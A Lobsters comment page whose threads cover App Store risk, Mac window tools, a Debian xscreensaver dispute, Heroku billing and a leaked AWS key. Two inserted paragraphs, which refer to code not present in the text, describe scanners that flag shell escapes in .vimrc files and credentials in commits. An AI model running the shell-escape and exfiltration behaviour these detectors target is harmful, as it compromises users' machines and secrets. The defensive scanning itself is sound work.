                                                                                                What if the App Store was the developer’s sole source of revenue? What liability does Apple have for messing up, if the removal was an error on their part? Should a developer have insurance for when an oversight effectively pulls their product from the shelves, even if temporarily? I think we’d like to think that the developer is always in the right in these, but generally, they’ve not been, often because they’ve misunderstood some ambiguous rule.

                                                                                                1. 4

                                                                                                  If you’re in business for yourself, and you cannot afford to be without your sole source of income, then you probably should get some insurance. In general, you should only insure against a loss you cannot afford; if you can’t survive without your income, that’s probably a good target for insurance of some kind.

                                                                                                2. 2

                                                                                                  You could give the users the source code, and let them compile and deploy it to the phones instead, but this requires Xcode on a Mac.

                                                                                                  1. 4

                                                                                                    This is what Flux did and Apple sent them a cease and desist.

                                                                                                    1. 3

                                                                                                      Isn’t it $99 / yr to have the ability to sideload apps from source code, if you want to keep it all on the up-and-up? Never used an iPhone here.

                                                                                                      1. 2

                                                                                                        No, sideloading is free now.

                                                                                                  2. 4

                                                                                                    Easier said than done. A lot of people really do depend on Apple for distribution and can’t do it themselves. Sure, they’re ‘makers of a product’ rather than ‘business owners’, but that’s a detail. The bigger point here is that Apple itself is unreliable. Its selling point is that it decreases the need to worry, and yet many developers are afraid of their apps being pulled and many consumers are afraid that their phones will crap out on them. This says more about Apple than about the dev.

                                                                                                    1. 7

                                                                                                      I think you’re right in part and wrong in part.

                                                                                                      As a person whose mortgage used to be paid - at least partially - through iOS development, yes. There was a constant worry that we’d break some small rule and Apple would pull all of our apps and we’d all be boned.

                                                                                                      But as a consumer, I’ve never worried about using an Apple device. The hardware was reliable and quickly replaced when problems arose, and the App Store model meant I never built a relationship with software providers (and I’m sure Apple wants this to be the case ;)) so I never felt the risks the developers took.

Apple could win a lot of goodwill by improving their business practices, but I’m not sure they actually care - I think iOS developers need Apple more than Apple needs them.

                                                                                                      1. 2

                                                                                                        But as a consumer, I’ve never worried about using an Apple device. The hardware was reliable and quickly replaced when problems arose, and the App Store model meant I never built a relationship with software providers (and I’m sure Apple wants this to be the case ;)) so I never felt the risks the developers took

Yes, but as with many online app stores these days, you’re really just “renting” your apps for the duration that the app is in good standing with the app store owner. As soon as Apple doesn’t like something, then at best you don’t get support or updates, at worst they delete it from your phone, maybe with good reason, maybe not. In some cases this can be good for a consumer; I’m sure they’ve found lots of malware, for example, that slipped through but Apple could remotely delete. But in many of the headlining cases they seem to be just enforcing their arbitrary rules somewhat haphazardly and may be in the wrong.

                                                                                                        1. 1

                                                                                                          But as a consumer, I’ve never worried about using an Apple device.

                                                                                                          Maybe I’ve had a particularly bad experience, but I recently lost all my messages and photos (which were backed up by my computer and Google, respectively—thank god) due to updating to iOS 10. I was under the impression that anyone who had used Apple’s products for a while was aware that they worked fairly well but also that Apple was not nearly as close as they claimed to being the technological messiah.

                                                                                                    1. 5

                                                                                                      OS X with lots of spaces and TotalSpaces and Witch to manage navigation.

                                                                                                      I’ve tried a few other window management tools but none have really sat right with me. I’d love something like i3/awesome/etc for Aqua windows, but haven’t found the right tool yet (suggestions are welcome!).

                                                                                                      1. 3

                                                                                                        Yeah, the closest I have to tiling is using Moom explicitly – other than its default snaps I have a custom 1 and 2 position that places windows 60-40 on screen.

                                                                                                        This past year and a half has been my first experience with a Mac at all and I tried the built-in “switch apps, then switch app windows” for about a year, I really did, but I finally got Contexts to get around.

                                                                                                        On other systems, I use i3, or Cinnamon with some plugs to make snapping nice, or Windows with AquaSnap (I saw they added their own take on universal tabs, too!).

                                                                                                      1. 3

                                                                                                        I’ve been a bit iffy on using it, it seems like it’s most practical when tying together several social media identities as proven, and I don’t really want there to be a definite connection between who I am across services. (I don’t necessarily want to maintain a “brand” like a lot of people in this sector do.) I don’t mind giving people a way to look up a key for sending me messages on each service separately though.

                                                                                                        1. 23

                                                                                                          OK, except jwz says there were security fixes, which changes the equation.

                                                                                                          Maybe I missed something, but I read this as: jwz wants to run his project as a single release stream, fixing security issues only in that stream, but the Debian maintainer apparently isn’t willing to backport fixes from that stream to Debian stable. In the bug report, the priority seems to be eliminating the popup message because it makes Debian look bad rather than figuring out how to get the security fixes into stable Debian–which really makes Debian look bad.

                                                                                                          That doesn’t sound “wrong”, exactly. It sounds like Debian wants jwz to either do extra work to support their release model, or suffer reputational damage from having an old insecure version of his software in the distro.

                                                                                                          1. 7

                                                                                                            Debian backports security fixes. The maintainer being apparently inactive is a tangential issue for which there is already an open bug.

                                                                                                            1. 13

                                                                                                              I know they’re supposed to backport security fixes. I’ve based my whole company on Debian and trust them to do that. Which is why I’m disappointed that people seem to be exclusively annoyed with jwz for putting this helpful last-resort canary in the code rather than annoyed with the maintainer for being asleep at the switch.

                                                                                                              1. 11

                                                                                                                I think xscreensaver has no public VCS repository, only release tarballs. This just doesn’t jibe with the stable update system Debian wants to run, and I wouldn’t expect someone to honestly try to isolate security fixes from diffs between entire releases in order to backport them.

                                                                                                                I don’t know what the policy behind the {release}-updates system is, but considering the upstream constraints and that this is a somewhat security-relevant package, maybe this should join alongside web browsers and be an evergreen package on stable releases, or, with consideration to the maintainer’s position, dropped as something untenable for stable Debian if they can’t get it on that system.

                                                                                                                1. 4

                                                                                                                  As I said above, it sounds like Debian wants jwz to do extra work to support their release model. If the Debian maintainer doesn’t want to put up with upstream’s dev process, it isn’t upstream’s problem, it’s Debian’s problem. If the maintainer doesn’t want to put in the effort to backport (which in this case would include making diffs) then yes, it should be dropped. Which is exactly what jwz asked for.

                                                                                                                  1. 4

                                                                                                                    They’re not asking for him to do something unique, non-standard or Debian-specific. They’re asking him to follow basic good practice.

                                                                                                          1. 2

                                                                                                            My last WinMo phone was the HTC HD2, which of course became nigh-legendary for the OS ports that hackers got running on it. I was pretty happy with WinMo at the time, and near the end they actually pulled together their own app store. I had licenses for FlexMail and IM+, I remember.

                                                                                                            Anyway one of the reasons WinMo had some neat tricks that weren’t reproduced for a while on locked-down Android and iOS devices is that while there were permissions in the sense of user/admin for some things, it was essentially a big lock switch that everyone turned off and there were no granular permissions per app. This allowed the WinMo equivalent of LOADLIN for early Android efforts – an app was able to clobber the memory of the running system, and this leveraged the WinMo drivers having done some hardware initialization too.

                                                                                                            Android brought with it those granular permissions and more standardized / blessed APIs for hardware components. This is stretching my memory a bit but I think WinMo pretty much had a different library per OEM for camera control. It also didn’t have the intents system, which makes customization more user-accessible. (Compare to switching shells by setting an exec path in a registry key.) Apps on WinMo could dig right into each other, in memory and in storage, using internals directly rather than forcing the use of defined IPC.

                                                                                                            Wow, it’s pretty slow, but there’s still some activity in the HD2 forums on XDA. I’d also be surprised if Lobsters has no one around who still supports a WinMo 6.5 device in the form of handheld inventory scanners, as plenty are still out there.

                                                                                                            1. 14

                                                                                                              I got burned by this on my hobby project. The self-updating command line tools started warning me that my database was wrong for technical reasons and needed to be updated (I wish I’d taken screenshots - if you see this, please do). It walked me through steps of updating to a new db with no mention of fees - I was thinking this was like the infrequent updates from deprecated app stacks. A few weeks after I did the update, they started charging me for both the $9/mo db I had and a new $50/mo db, backups stopped working, it’s not clear which db is even in use, support was shocked, shocked that their tool had told me to update to a more expensive thing, and rather than resolving the issue they closed my ticket.

                                                                                                              I’m looking into the various “heroku in a box” tools and will migrate my hobby project to a $5/mo VPS with SSL this weekend, contest the charges with my payment card, and start moving my employer’s consulting clients over to whatever that tool is. Even if the card doesn’t chargeback my lost $100, Heroku will lose that in… uh, about an hour given the size and number of clients we have.

                                                                                                              1. 7

                                                                                                                I didn’t keep it running much longer than it took to push an app and see how it works, but DigitalOcean’s Dokku prebuilt image was pretty easy to get going. IIRC I just needed to add a plugin for PostgreSQL support if I wanted to manage that through Dokku’s interface, but there were more than one to check out with different features in terms of how they separate accounts/dbs/instances, or had backup/restore helpers.

                                                                                                                (I don’t think Dokku is hard to set up, I’ve also toyed with it on local vms, but the one-click app image on DO is how I learned of the project at all, so here’s my plug for DO.)

                                                                                                                1. 7

                                                                                                                  This just prompted me to migrate my (~5) personal apps from Heroku to Dokku on Digital Ocean. Super easy to do, and on a $10 Digital Ocean droplet, it’s already more cost efficient than if I wanted Heroku to run them all 24/7.

                                                                                                                2. 2

                                                                                                                  I’ve had reasonable success with using Dokku on a $5/mo DO Droplet. I’ve considered looking at things like Deis or self-hosted OpenShift, but Dokku is really the simplest / lightest one that fits my needs (it also helps that there’s even a Dokku app stack on DO).

                                                                                                                  While I haven’t experienced that level of WTFery with Heroku as you’ve mentioned, I have definitely been hit with a bill I wasn’t expecting (same for AWS..).

                                                                                                                  1. 2

                                                                                                                    I got burned in a similar way where I logged in and it told me to fix my db, but it only gave me options for the more expensive databases, so I clicked cancel. Next month, behold, I was now the proud owner of a $50/mo db on a free grandfathered heroku stack. I contacted support and they were adamant about how ‘you can’t sign up for a new service without going through the process’ and told me it was my fault. Their story was that because I initiated the upgrade I was no longer eligible for the grandfathered db and therefore signed up for the paid db which I agreed to by clicking a button like “Resolve Issue” or something. I backed up my hobby projects, cancelled the service (though they still charged me). I then contacted heroku (again) and told them I would be filing a chargeback on the charge if they didn’t refund it. When they didn’t, I provided Citi with the email chain, the original support ticket chain, and the charge. Because the support was started so soon after the charge was made and the support was ended so abruptly, they decided in my favor. Used to like Heroku, but they literally destroyed their reputation with one interaction. I don’t have clients, but the company I used to work at was looking at GCloud vs AWS vs Heroku and I made sure none of that very large amount of servers went to heroku.

                                                                                                                  1. 5

                                                                                                                    Very cool, and I didn’t even know :TOhtml was a thing, and syntax-styled too!

                                                                                                                    I shied away from set exrc / set secure, because I clone a lot of stuff from github and don’t check for dot-files before I go poking around with vim/view, and at a glance it seemed like it can’t do much for bad stuff that git creates in workdirs, owned by me. I’m iffy about all that kinda “behave differently from files in each directory” stuff.
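A pre-open check for the worry in the comment above, as an added example (my code, not Vim's and not the commenter's): it lists the per-directory rc files Vim sources when 'exrc' is on and flags lines that 'secure' would refuse in them (autocmd, shell escapes, write commands) or that otherwise spawn a process. The file names and patterns are my assumption, taken from `:help 'exrc'` and `:help 'secure'`, and the whole thing is a heuristic rather than a Vimscript parser; the cloned directory and its malicious `.vimrc` are constructed inline.

```python
"""Scan a freshly cloned directory for per-directory Vim rc files that
'set exrc' would source, and flag lines that could run shell code.
Added example for this thread; not Vim's or the commenter's code."""
import os
import re
import tempfile

# Assumption: names Vim (and Neovim) read from the current directory when
# 'exrc' is on; see :help 'exrc'.  Neovim's .nvim.lua is included too.
LOCAL_RC_NAMES = (".vimrc", ".exrc", ".gvimrc", "_vimrc", ".nvimrc", ".nvim.lua")

# Constructs 'set secure' refuses in a local rc (autocmd, shell, write),
# plus common process-spawning calls from Vimscript and Lua.  Heuristic,
# not a parser: a determined attacker can obfuscate past these.
DANGEROUS = (
    (re.compile(r"^\s*:?\s*au(tocmd)?\b"), "autocmd"),
    (re.compile(r"^\s*:?\s*!"), "shell command (:!)"),
    (re.compile(r"\bsilent!?\s+!"), "silent shell escape"),
    (re.compile(r"\bsystem\s*\("), "system() call"),
    (re.compile(r"^\s*:?\s*w(rite)?\b"), "write command"),
    (re.compile(r"\b(job_start|jobstart|os\.execute|io\.popen)\s*\("), "process spawn"),
)


def find_local_rc_files(repo_dir):
    """Return the local rc files present in repo_dir, sorted by name."""
    return sorted(
        os.path.join(repo_dir, name)
        for name in LOCAL_RC_NAMES
        if os.path.isfile(os.path.join(repo_dir, name))
    )


def scan_rc_text(text):
    """Return (line_number, reason, line) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith('"'):  # blank or Vimscript comment
            continue
        for pattern, reason in DANGEROUS:
            if pattern.search(line):
                findings.append((lineno, reason, stripped))
                break  # report the first matching reason per line
    return findings


def scan_repo(repo_dir):
    """Map each local rc file name found in repo_dir to its findings."""
    report = {}
    for path in find_local_rc_files(repo_dir):
        with open(path, encoding="utf-8", errors="replace") as fh:
            report[os.path.basename(path)] = scan_rc_text(fh.read())
    return report


def demo():
    """Constructed clone: a .vimrc that looks like project settings but
    exfiltrates the username on every write and runs a command on load."""
    with tempfile.TemporaryDirectory() as repo:
        with open(os.path.join(repo, ".vimrc"), "w", encoding="utf-8") as fh:
            fh.write(
                '" project editor settings\n'
                "set tabstop=4 shiftwidth=4\n"
                "autocmd BufWritePost * silent !curl -s http://attacker.invalid/$(whoami)\n"
                "let s:out = system('id')\n"
            )
        return scan_repo(repo)


if __name__ == "__main__":
    for name, findings in demo().items():
        for lineno, reason, line in findings:
            print(f"{name}:{lineno}: {reason}: {line}")
```

Run it from a wrapper before `cd`-ing into a clone; an empty report means no local rc file exists, not that the repository is safe. With 'exrc' left off, none of these files are read at all, which is the simpler defence the comment settles on.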

                                                                                                                    1. 1

                                                                                                                      As much as I hate to admit this, neither Microsoft nor GitHub are directly responsible for the data breach. The fact that the key was in the repo was the developer’s fault and no one else’s, it looks like he is just looking for a target to lash out at.

                                                                                                                      1. 7

                                                                                                                        As @craigstuntz linked, Microsoft tracked and fixed it as a VisualStudio bug. It is not user error. I agree with you that putting keys in source control is a bad practice, but “developer’s fault and no one else’s” is simply incorrect.

                                                                                                                        1. 8

                                                                                                                          The key disclosure isn’t even the only disclosure here, like yes secrets in git is a terrible practice and it’s reasonable for like one person to show up in the thread saying so, and not like a jerk, but c'mon have some chill, people. This dude was also worried about his source and he may be out 6.5 grand. That sucks and he might just be writing the blog post to sway some Amazon robots into doing something about the bill, too.

                                                                                                                          1. 2

                                                                                                                            OK, understood. Sorry for the flippant remark, didn’t mean to be incendiary.

                                                                                                                            @meridith Thanks for reminding me of the other factors he has to deal with, for some reason they hadn’t completely sunk in when I wrote that. ;-)

                                                                                                                        2. 2

                                                                                                                          To the people who dv-ed as incorrect: My point is not that MS and GitHub are entirely free from blame, but that they are not directly responsible. You shouldn’t even be putting keys in private repos.

                                                                                                                          1. 1

                                                                                                                            I disagree. The guy wanted to put private data in a private repo. He clicked the “private repository” checkbox, and the plugin made the repo public. Clearly a software bug.

                                                                                                                            I agree private keys in a repo might not be a good idea, but it’s irrelevant here. People put a lot of valuable private data in source control (like proprietary source code).

                                                                                                                            I’m almost surprised GitHub didn’t pick up the bill just to avoid the embarrassment of having this all over tech news sites. Clearly they didn’t test it very well…
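For the secrets-in-git point that runs through this subthread, an added example (my code, not the blog author's, Microsoft's or GitHub's): a pre-commit style scanner that flags AWS access key IDs by their fixed shape, the matching 40-character secret when it is assigned to its usual variable name, PEM private-key headers, and other secret-looking assignments whose value has high Shannon entropy. The regexes, the 3.5-bit threshold and the sample credentials file are my assumptions; the key pair in the sample is the placeholder pair from AWS's own documentation, not a live credential. One caveat the thread skirts: a scanner only helps before the push. Once a key has sat in a public repo for even a few minutes, assume it was harvested and revoke it; deleting the commit does not undo that.

```python
"""Pre-commit style check for credentials about to land in a repository.
Added example for this thread, not the blogger's, Microsoft's or GitHub's
code.  The regexes, the entropy threshold and the sample file are assumptions."""
import math
import re
import subprocess
from collections import Counter

# An AWS access key ID has a fixed shape: AKIA/ASIA + 16 uppercase alphanumerics.
AWS_ACCESS_KEY_ID = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")
# The matching secret is 40 base64-ish characters assigned to a known variable name.
AWS_SECRET_ASSIGN = re.compile(
    r"(?i)aws[_-]?secret[_-]?access[_-]?key\W{0,3}[\"']?([A-Za-z0-9/+=]{40})\b"
)
PRIVATE_KEY_BLOCK = re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |)PRIVATE KEY-----")
# Anything else that looks like a secret assignment; filtered by entropy below
# so that placeholders such as "changeme" or "xxxxxxxx" do not fire.
GENERIC_ASSIGN = re.compile(
    r"(?i)\b(secret|token|password|api[_-]?key)\W{0,3}[\"']?([A-Za-z0-9/+=_\-]{20,})"
)


def shannon_entropy(s):
    """Bits per character.  32 random hex chars reach 4.0, a 40-char random
    base64 secret about 5; repeated or dictionary-like values sit well below 3.5."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(text, path="<text>", entropy_threshold=3.5):
    """Return (path, line_number, kind) for each line that looks like a credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if AWS_ACCESS_KEY_ID.search(line):
            findings.append((path, lineno, "aws-access-key-id"))
        elif PRIVATE_KEY_BLOCK.search(line):
            findings.append((path, lineno, "private-key"))
        elif AWS_SECRET_ASSIGN.search(line):
            findings.append((path, lineno, "aws-secret-access-key"))
        else:
            m = GENERIC_ASSIGN.search(line)
            if m and shannon_entropy(m.group(2)) >= entropy_threshold:
                findings.append((path, lineno, "high-entropy-" + m.group(1).lower()))
    return findings


def scan_staged_changes():
    """Hook entry point: scan only the lines being added in the staged diff.
    Line numbers reported here are positions in the diff, not in the file."""
    diff = subprocess.run(
        ["git", "diff", "--cached", "-U0", "--no-color"],
        check=True, capture_output=True, text=True,
    ).stdout
    added = "\n".join(
        line[1:] for line in diff.splitlines()
        if line.startswith("+") and not line.startswith("+++")
    )
    return scan_text(added, path="<staged>")


# Constructed sample: the key pair is the placeholder pair used in AWS's own
# documentation, not a live credential; the remaining lines are filler.
SAMPLE_CREDENTIALS_FILE = """\
[default]
region = us-east-1
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
api_key = "9f8e7d6c5b4a39281706f5e4d3c2b1a0"
password = "aaaaaaaaaaaaaaaaaaaaaaaa"
"""


def demo():
    """Scan the constructed sample; the all-'a' password is below the threshold."""
    return scan_text(SAMPLE_CREDENTIALS_FILE, path="credentials")


if __name__ == "__main__":
    for path, lineno, kind in demo():
        print(f"{path}:{lineno}: {kind}")
```

Wired in as `.git/hooks/pre-commit` (exit non-zero when `scan_staged_changes()` returns anything), this stops the commit on the developer's machine, which is the only place the check is cheap; the real fix for the case in the article is still key rotation plus moving credentials out of the repository into the environment or a secrets store.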